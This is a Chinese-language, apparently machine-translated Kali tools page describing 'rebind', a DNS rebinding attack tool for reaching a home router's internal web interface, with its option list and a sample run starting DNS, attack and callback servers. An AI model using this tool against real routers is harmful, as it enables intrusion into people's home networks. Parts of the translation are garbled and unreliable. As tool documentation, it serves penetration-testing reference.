重新绑定包装说明

重新绑定是实现多个A记录DNS重新绑定攻击的工具。虽然这种工具在最初写入到目标家用路由器,它可以用于靶向任何公开的(非RFC1918)的IP地址。重新绑定提供一个外部攻击者访问目标路由器的内部Web界面。该工具适用于实现终端系统模型薄弱的IP协议栈的路由器,有专门配置的防火墙规则,谁是自己的Web服务绑定到路由器的WAN接口。注意,远程管理不需要启用此攻击工作。所有需要的是,所述目标网络冲浪到被控制,或已被破坏,由攻击者网站内的用户。 资料来源:https://code.google.com/p/rebind/

重新绑定首页 | 卡利重新绑定回购

  • 作者:克雷格·Heffner
  • 许可:MIT

    0x01 包括在重新绑定包工具

    重新绑定 - DNS重新绑定工具

    
    :~# rebind
    Rebind v0.3.4
    Usage: rebind [OPTIONS]
      -i <interface>  Specify the network interface to bind to
      -d <fqdn>       Specify your registered domain name
      -u <user>       Specify the Basic Authentication user name [admin]
      -a <pass>       Specify the Basic Authentication password [admin]
      -r <path>       Specify the initial URL request path [/]
      -t <ip>         Specify a comma separated list of target IP addresses [client IP]
      -n <time>       Specify the callback interval in milliseconds [2000]
      -p <port>       Specify the target port [80]
      -c <port>       Specify the callback port [81]
      -C <value>      Specify a cookie to set for the client
      -H <file>       Specify a file of HTTP headers for the client to send to the target
    

    0x02 重新绑定用法示例

    使用eth0接口 (-i eth0的),并进行 重新绑定攻击与指定域 (-d kali.local):


 :~# rebind -i eth0 -d kali.local
[+] Starting DNS server on port 53
[+] Starting attack Web server on port 80
[+] Starting callback Web server on port 81
[+] Starting proxy server on 192.168.1.202:664
[+] Services started and running!
> dns
[+] 192.168.1.202       kali.local.
[+] 192.168.1.202       www.kali.local.
[+] 192.168.1.202       ns1.kali.local.
[+] 192.168.1.202       ns2.kali.local.

原文来自:https://www.hackfun.org/kali-tools/rebind_zh.html。转载请注明原出处,商用请联系原作者授权。

results matching ""

    No results matching ""